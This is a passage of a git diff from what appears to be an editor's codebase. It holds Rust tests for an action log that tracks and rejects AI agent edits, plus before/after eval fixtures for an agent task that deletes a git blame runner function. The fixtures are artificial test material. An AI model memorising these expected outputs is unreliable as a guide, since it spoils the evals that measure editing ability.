log.will_delete_buffer(buffer1.clone(), cx)); + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer2.clone(), cx)); + project + .update(cx, |project, cx| { + project.delete_file(file1_path.clone(), false, cx) + }) + .unwrap() + .await + .unwrap(); + project + .update(cx, |project, cx| { + project.delete_file(file2_path.clone(), false, cx) + }) + .unwrap() + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![ + ( + buffer1.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "lorem\n".into(), + }] + ), + ( + buffer2.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "ipsum\n".into(), + }], + ) + ] + ); + + // Simulate file1 being recreated externally. + fs.insert_file(path!("/dir/file1"), "LOREM".as_bytes().to_vec()) + .await; + + // Simulate file2 being recreated by a tool. + let buffer2 = project + .update(cx, |project, cx| project.open_buffer(file2_path, cx)) + .await + .unwrap(); + action_log.update(cx, |log, cx| log.buffer_read(buffer2.clone(), cx)); + buffer2.update(cx, |buffer, cx| buffer.set_text("IPSUM", cx)); + action_log.update(cx, |log, cx| log.buffer_edited(buffer2.clone(), cx)); + project + .update(cx, |project, cx| project.save_buffer(buffer2.clone(), cx)) + .await + .unwrap(); + + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer2.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 5), + diff_status: DiffHunkStatusKind::Modified, + old_text: "ipsum\n".into(), + }], + )] + ); + + // Simulate file2 being deleted externally. 
+ fs.remove_file(path!("/dir/file2").as_ref(), RemoveOptions::default()) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) + .unwrap() + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndE\nXYZf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(5, 0)..Point::new(5, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + // If the rejected range doesn't overlap with any hunk, we ignore it. 
+ action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(4, 0)..Point::new(4, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndE\nXYZf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(5, 0)..Point::new(5, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(0, 0)..Point::new(1, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(4, 0)..Point::new(4, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + }], + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(4, 0)..Point::new(4, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmno" + ); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_multiple_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| 
project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) + .unwrap() + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndE\nXYZf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(5, 0)..Point::new(5, 3), + diff_status: DiffHunkStatusKind::Modified, + old_text: "mno".into(), + } + ], + )] + ); + + action_log.update(cx, |log, cx| { + let range_1 = buffer.read(cx).anchor_before(Point::new(0, 0)) + ..buffer.read(cx).anchor_before(Point::new(1, 0)); + let range_2 = buffer.read(cx).anchor_before(Point::new(5, 0)) + ..buffer.read(cx).anchor_before(Point::new(5, 3)); + + log.reject_edits_in_ranges(buffer.clone(), vec![range_1, range_2], cx) + .detach(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmno" + ); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndef\nghi\njkl\nmno" + ); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_deleted_file(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "content"})) + .await; + let project = 
Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path.clone(), cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| { + project.delete_file(file_path.clone(), false, cx) + }) + .unwrap() + .await + .unwrap(); + cx.run_until_parked(); + assert!(!fs.is_file(path!("/dir/file").as_ref()).await); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "content".into(), + }] + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(0, 0)..Point::new(0, 0)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |buffer, _| buffer.text()), "content"); + assert!(fs.is_file(path!("/dir/file").as_ref()).await); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_reject_created_file(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| { + project.find_project_path("dir/new_file", cx) + }) + .unwrap(); + + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| buffer.set_text("content", cx)); + 
action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .unwrap(); + assert!(fs.is_file(path!("/dir/new_file").as_ref()).await); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 7), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(0, 0)..Point::new(0, 11)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert!(!fs.is_file(path!("/dir/new_file").as_ref()).await); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 100)] + async fn test_random_diffs(mut rng: StdRng, cx: &mut TestAppContext) { + init_test(cx); + + let operations = env::var("OPERATIONS") + .map(|i| i.parse().expect("invalid `OPERATIONS` variable")) + .unwrap_or(20); + + let text = RandomCharIter::new(&mut rng).take(50).collect::(); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": text})).await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + + for _ in 0..operations { + match rng.gen_range(0..100) { + 0..25 => { + action_log.update(cx, |log, cx| { + let range = buffer.read(cx).random_byte_range(0, &mut rng); + log::info!("keeping edits in range {:?}", range); + log.keep_edits_in_range(buffer.clone(), range, cx) + }); + } + 25..50 => { + action_log + .update(cx, 
|log, cx| { + let range = buffer.read(cx).random_byte_range(0, &mut rng); + log::info!("rejecting edits in range {:?}", range); + log.reject_edits_in_ranges(buffer.clone(), vec![range], cx) + }) + .await + .unwrap(); + } + _ => { + let is_agent_change = rng.gen_bool(0.5); + if is_agent_change { + log::info!("agent edit"); + } else { + log::info!("user edit"); + } + cx.update(|cx| { + buffer.update(cx, |buffer, cx| buffer.randomly_edit(&mut rng, 1, cx)); + if is_agent_change { + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + } + }); + } + } + + if rng.gen_bool(0.2) { + quiesce(&action_log, &buffer, cx); + } + } + + quiesce(&action_log, &buffer, cx); + + fn quiesce( + action_log: &Entity, + buffer: &Entity, + cx: &mut TestAppContext, + ) { + log::info!("quiescing..."); + cx.run_until_parked(); + action_log.update(cx, |log, cx| { + let tracked_buffer = log.tracked_buffers.get(&buffer).unwrap(); + let mut old_text = tracked_buffer.base_text.clone(); + let new_text = buffer.read(cx).as_rope(); + for edit in tracked_buffer.unreviewed_changes.edits() { + let old_start = old_text.point_to_offset(Point::new(edit.new.start, 0)); + let old_end = old_text.point_to_offset(cmp::min( + Point::new(edit.new.start + edit.old_len(), 0), + old_text.max_point(), + )); + old_text.replace( + old_start..old_end, + &new_text.slice_rows(edit.new.clone()).to_string(), + ); + } + pretty_assertions::assert_eq!(old_text.to_string(), new_text.to_string()); + }) + } + } + + #[derive(Debug, Clone, PartialEq, Eq)] + struct HunkStatus { + range: Range, + diff_status: DiffHunkStatusKind, + old_text: String, + } + + fn unreviewed_hunks( + action_log: &Entity, + cx: &TestAppContext, + ) -> Vec<(Entity, Vec)> { + cx.read(|cx| { + action_log + .read(cx) + .changed_buffers(cx) + .into_iter() + .map(|(buffer, diff)| { + let snapshot = buffer.read(cx).snapshot(); + ( + buffer, + diff.read(cx) + .hunks(&snapshot, cx) + .map(|hunk| HunkStatus { + diff_status: hunk.status().kind, + 
range: hunk.range, + old_text: diff + .read(cx) + .base_text() + .text_for_range(hunk.diff_base_byte_range) + .collect(), + }) + .collect(), + ) + }) + .collect() + }) + } +} diff --git a/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/after.rs b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/after.rs new file mode 100644 index 0000000000000000000000000000000000000000..89277be4436bf000f4b061d8b89fef5f489f9fea --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/after.rs @@ -0,0 +1,328 @@ +use crate::commit::get_messages; +use crate::{GitRemote, Oid}; +use anyhow::{Context as _, Result, anyhow}; +use collections::{HashMap, HashSet}; +use futures::AsyncWriteExt; +use gpui::SharedString; +use serde::{Deserialize, Serialize}; +use std::process::Stdio; +use std::{ops::Range, path::Path}; +use text::Rope; +use time::OffsetDateTime; +use time::UtcOffset; +use time::macros::format_description; + +pub use git2 as libgit; + +#[derive(Debug, Clone, Default)] +pub struct Blame { + pub entries: Vec, + pub messages: HashMap, + pub remote_url: Option, +} + +#[derive(Clone, Debug, Default)] +pub struct ParsedCommitMessage { + pub message: SharedString, + pub permalink: Option, + pub pull_request: Option, + pub remote: Option, +} + +impl Blame { + pub async fn for_path( + git_binary: &Path, + working_directory: &Path, + path: &Path, + content: &Rope, + remote_url: Option, + ) -> Result { + let output = run_git_blame(git_binary, working_directory, path, content).await?; + let mut entries = parse_git_blame(&output)?; + entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + + let mut unique_shas = HashSet::default(); + + for entry in entries.iter_mut() { + unique_shas.insert(entry.sha); + } + + let shas = unique_shas.into_iter().collect::>(); + let messages = get_messages(working_directory, &shas) + .await + .context("failed to get commit messages")?; + + Ok(Self { + entries, + messages, + remote_url, + }) + } +} + +const 
GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; +const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; + +#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] +pub struct BlameEntry { + pub sha: Oid, + + pub range: Range, + + pub original_line_number: u32, + + pub author: Option, + pub author_mail: Option, + pub author_time: Option, + pub author_tz: Option, + + pub committer_name: Option, + pub committer_email: Option, + pub committer_time: Option, + pub committer_tz: Option, + + pub summary: Option, + + pub previous: Option, + pub filename: String, +} + +impl BlameEntry { + // Returns a BlameEntry by parsing the first line of a `git blame --incremental` + // entry. The line MUST have this format: + // + // <40-byte-hex-sha1> + fn new_from_blame_line(line: &str) -> Result { + let mut parts = line.split_whitespace(); + + let sha = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing sha from {line}"))?; + + let original_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing original line number from {line}"))?; + let final_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing final line number from {line}"))?; + + let line_count = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing line count from {line}"))?; + + let start_line = final_line_number.saturating_sub(1); + let end_line = start_line + line_count; + let range = start_line..end_line; + + Ok(Self { + sha, + range, + original_line_number, + ..Default::default() + }) + } + + pub fn author_offset_date_time(&self) -> Result { + if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { + let format = format_description!("[offset_hour][offset_minute]"); + let offset = UtcOffset::parse(author_tz, &format)?; + let date_time_utc = 
OffsetDateTime::from_unix_timestamp(author_time)?; + + Ok(date_time_utc.to_offset(offset)) + } else { + // Directly return current time in UTC if there's no committer time or timezone + Ok(time::OffsetDateTime::now_utc()) + } + } +} + +// parse_git_blame parses the output of `git blame --incremental`, which returns +// all the blame-entries for a given path incrementally, as it finds them. +// +// Each entry *always* starts with: +// +// <40-byte-hex-sha1> +// +// Each entry *always* ends with: +// +// filename +// +// Line numbers are 1-indexed. +// +// A `git blame --incremental` entry looks like this: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 +// author Joe Schmoe +// author-mail +// author-time 1709741400 +// author-tz +0100 +// committer Joe Schmoe +// committer-mail +// committer-time 1709741400 +// committer-tz +0100 +// summary Joe's cool commit +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// If the entry has the same SHA as an entry that was already printed then no +// signature information is printed: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html +fn parse_git_blame(output: &str) -> Result> { + let mut entries: Vec = Vec::new(); + let mut index: HashMap = HashMap::default(); + + let mut current_entry: Option = None; + + for line in output.lines() { + let mut done = false; + + match &mut current_entry { + None => { + let mut new_entry = BlameEntry::new_from_blame_line(line)?; + + if let Some(existing_entry) = index + .get(&new_entry.sha) + .and_then(|slot| entries.get(*slot)) + { + new_entry.author.clone_from(&existing_entry.author); + new_entry + .author_mail + .clone_from(&existing_entry.author_mail); + new_entry.author_time = existing_entry.author_time; + 
new_entry.author_tz.clone_from(&existing_entry.author_tz); + new_entry + .committer_name + .clone_from(&existing_entry.committer_name); + new_entry + .committer_email + .clone_from(&existing_entry.committer_email); + new_entry.committer_time = existing_entry.committer_time; + new_entry + .committer_tz + .clone_from(&existing_entry.committer_tz); + new_entry.summary.clone_from(&existing_entry.summary); + } + + current_entry.replace(new_entry); + } + Some(entry) => { + let Some((key, value)) = line.split_once(' ') else { + continue; + }; + let is_committed = !entry.sha.is_zero(); + match key { + "filename" => { + entry.filename = value.into(); + done = true; + } + "previous" => entry.previous = Some(value.into()), + + "summary" if is_committed => entry.summary = Some(value.into()), + "author" if is_committed => entry.author = Some(value.into()), + "author-mail" if is_committed => entry.author_mail = Some(value.into()), + "author-time" if is_committed => { + entry.author_time = Some(value.parse::()?) + } + "author-tz" if is_committed => entry.author_tz = Some(value.into()), + + "committer" if is_committed => entry.committer_name = Some(value.into()), + "committer-mail" if is_committed => entry.committer_email = Some(value.into()), + "committer-time" if is_committed => { + entry.committer_time = Some(value.parse::()?) + } + "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), + _ => {} + } + } + }; + + if done { + if let Some(entry) = current_entry.take() { + index.insert(entry.sha, entries.len()); + + // We only want annotations that have a commit. 
+ if !entry.sha.is_zero() { + entries.push(entry); + } + } + } + } + + Ok(entries) +} + +#[cfg(test)] +mod tests { + use std::path::PathBuf; + + use super::BlameEntry; + use super::parse_git_blame; + + fn read_test_data(filename: &str) -> String { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push(filename); + + std::fs::read_to_string(&path) + .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) + } + + fn assert_eq_golden(entries: &Vec, golden_filename: &str) { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push("golden"); + path.push(format!("{}.json", golden_filename)); + + let mut have_json = + serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); + // We always want to save with a trailing newline. + have_json.push('\n'); + + let update = std::env::var("UPDATE_GOLDEN") + .map(|val| val.eq_ignore_ascii_case("true")) + .unwrap_or(false); + + if update { + std::fs::create_dir_all(path.parent().unwrap()) + .expect("could not create golden test data directory"); + std::fs::write(&path, have_json).expect("could not write out golden data"); + } else { + let want_json = + std::fs::read_to_string(&path).unwrap_or_else(|_| { + panic!("could not read golden test data file at {:?}. 
Did you run the test with UPDATE_GOLDEN=true before?", path); + }).replace("\r\n", "\n"); + + pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); + } + } + + #[test] + fn test_parse_git_blame_not_committed() { + let output = read_test_data("blame_incremental_not_committed"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_not_committed"); + } + + #[test] + fn test_parse_git_blame_simple() { + let output = read_test_data("blame_incremental_simple"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_simple"); + } + + #[test] + fn test_parse_git_blame_complex() { + let output = read_test_data("blame_incremental_complex"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_complex"); + } +} diff --git a/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/before.rs b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..36fccb513271265ff7ae3d54b6f974beeb809737 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/before.rs @@ -0,0 +1,371 @@ +use crate::commit::get_messages; +use crate::{GitRemote, Oid}; +use anyhow::{Context as _, Result, anyhow}; +use collections::{HashMap, HashSet}; +use futures::AsyncWriteExt; +use gpui::SharedString; +use serde::{Deserialize, Serialize}; +use std::process::Stdio; +use std::{ops::Range, path::Path}; +use text::Rope; +use time::OffsetDateTime; +use time::UtcOffset; +use time::macros::format_description; + +pub use git2 as libgit; + +#[derive(Debug, Clone, Default)] +pub struct Blame { + pub entries: Vec, + pub messages: HashMap, + pub remote_url: Option, +} + +#[derive(Clone, Debug, Default)] +pub struct ParsedCommitMessage { + pub message: SharedString, + pub permalink: Option, + pub pull_request: Option, + pub remote: Option, +} + +impl Blame { + pub 
async fn for_path( + git_binary: &Path, + working_directory: &Path, + path: &Path, + content: &Rope, + remote_url: Option, + ) -> Result { + let output = run_git_blame(git_binary, working_directory, path, content).await?; + let mut entries = parse_git_blame(&output)?; + entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + + let mut unique_shas = HashSet::default(); + + for entry in entries.iter_mut() { + unique_shas.insert(entry.sha); + } + + let shas = unique_shas.into_iter().collect::>(); + let messages = get_messages(working_directory, &shas) + .await + .context("failed to get commit messages")?; + + Ok(Self { + entries, + messages, + remote_url, + }) + } +} + +const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; +const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; + +async fn run_git_blame( + git_binary: &Path, + working_directory: &Path, + path: &Path, + contents: &Rope, +) -> Result { + let mut child = util::command::new_smol_command(git_binary) + .current_dir(working_directory) + .arg("blame") + .arg("--incremental") + .arg("--contents") + .arg("-") + .arg(path.as_os_str()) + .stdin(Stdio::piped()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()) + .spawn() + .context("starting git blame process")?; + + let stdin = child + .stdin + .as_mut() + .context("failed to get pipe to stdin of git blame command")?; + + for chunk in contents.chunks() { + stdin.write_all(chunk.as_bytes()).await?; + } + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { + return Ok(String::new()); + } + anyhow::bail!("git blame process failed: {stderr}"); + } + + Ok(String::from_utf8(output.stdout)?) 
+} + +#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] +pub struct BlameEntry { + pub sha: Oid, + + pub range: Range, + + pub original_line_number: u32, + + pub author: Option, + pub author_mail: Option, + pub author_time: Option, + pub author_tz: Option, + + pub committer_name: Option, + pub committer_email: Option, + pub committer_time: Option, + pub committer_tz: Option, + + pub summary: Option, + + pub previous: Option, + pub filename: String, +} + +impl BlameEntry { + // Returns a BlameEntry by parsing the first line of a `git blame --incremental` + // entry. The line MUST have this format: + // + // <40-byte-hex-sha1> + fn new_from_blame_line(line: &str) -> Result { + let mut parts = line.split_whitespace(); + + let sha = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing sha from {line}"))?; + + let original_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing original line number from {line}"))?; + let final_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing final line number from {line}"))?; + + let line_count = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing line count from {line}"))?; + + let start_line = final_line_number.saturating_sub(1); + let end_line = start_line + line_count; + let range = start_line..end_line; + + Ok(Self { + sha, + range, + original_line_number, + ..Default::default() + }) + } + + pub fn author_offset_date_time(&self) -> Result { + if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { + let format = format_description!("[offset_hour][offset_minute]"); + let offset = UtcOffset::parse(author_tz, &format)?; + let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; + + Ok(date_time_utc.to_offset(offset)) + } else { + // Directly return current time in UTC if there's no 
committer time or timezone + Ok(time::OffsetDateTime::now_utc()) + } + } +} + +// parse_git_blame parses the output of `git blame --incremental`, which returns +// all the blame-entries for a given path incrementally, as it finds them. +// +// Each entry *always* starts with: +// +// <40-byte-hex-sha1> +// +// Each entry *always* ends with: +// +// filename +// +// Line numbers are 1-indexed. +// +// A `git blame --incremental` entry looks like this: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 +// author Joe Schmoe +// author-mail +// author-time 1709741400 +// author-tz +0100 +// committer Joe Schmoe +// committer-mail +// committer-time 1709741400 +// committer-tz +0100 +// summary Joe's cool commit +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// If the entry has the same SHA as an entry that was already printed then no +// signature information is printed: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html +fn parse_git_blame(output: &str) -> Result> { + let mut entries: Vec = Vec::new(); + let mut index: HashMap = HashMap::default(); + + let mut current_entry: Option = None; + + for line in output.lines() { + let mut done = false; + + match &mut current_entry { + None => { + let mut new_entry = BlameEntry::new_from_blame_line(line)?; + + if let Some(existing_entry) = index + .get(&new_entry.sha) + .and_then(|slot| entries.get(*slot)) + { + new_entry.author.clone_from(&existing_entry.author); + new_entry + .author_mail + .clone_from(&existing_entry.author_mail); + new_entry.author_time = existing_entry.author_time; + new_entry.author_tz.clone_from(&existing_entry.author_tz); + new_entry + .committer_name + .clone_from(&existing_entry.committer_name); + new_entry + .committer_email + 
.clone_from(&existing_entry.committer_email); + new_entry.committer_time = existing_entry.committer_time; + new_entry + .committer_tz + .clone_from(&existing_entry.committer_tz); + new_entry.summary.clone_from(&existing_entry.summary); + } + + current_entry.replace(new_entry); + } + Some(entry) => { + let Some((key, value)) = line.split_once(' ') else { + continue; + }; + let is_committed = !entry.sha.is_zero(); + match key { + "filename" => { + entry.filename = value.into(); + done = true; + } + "previous" => entry.previous = Some(value.into()), + + "summary" if is_committed => entry.summary = Some(value.into()), + "author" if is_committed => entry.author = Some(value.into()), + "author-mail" if is_committed => entry.author_mail = Some(value.into()), + "author-time" if is_committed => { + entry.author_time = Some(value.parse::()?) + } + "author-tz" if is_committed => entry.author_tz = Some(value.into()), + + "committer" if is_committed => entry.committer_name = Some(value.into()), + "committer-mail" if is_committed => entry.committer_email = Some(value.into()), + "committer-time" if is_committed => { + entry.committer_time = Some(value.parse::()?) + } + "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), + _ => {} + } + } + }; + + if done { + if let Some(entry) = current_entry.take() { + index.insert(entry.sha, entries.len()); + + // We only want annotations that have a commit. + if !entry.sha.is_zero() { + entries.push(entry); + } + } + } + } + + Ok(entries) +} + +#[cfg(test)] +mod tests { + use std::path::PathBuf; + + use super::BlameEntry; + use super::parse_git_blame; + + fn read_test_data(filename: &str) -> String { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push(filename); + + std::fs::read_to_string(&path) + .unwrap_or_else(|_| panic!("Could not read test data at {:?}. 
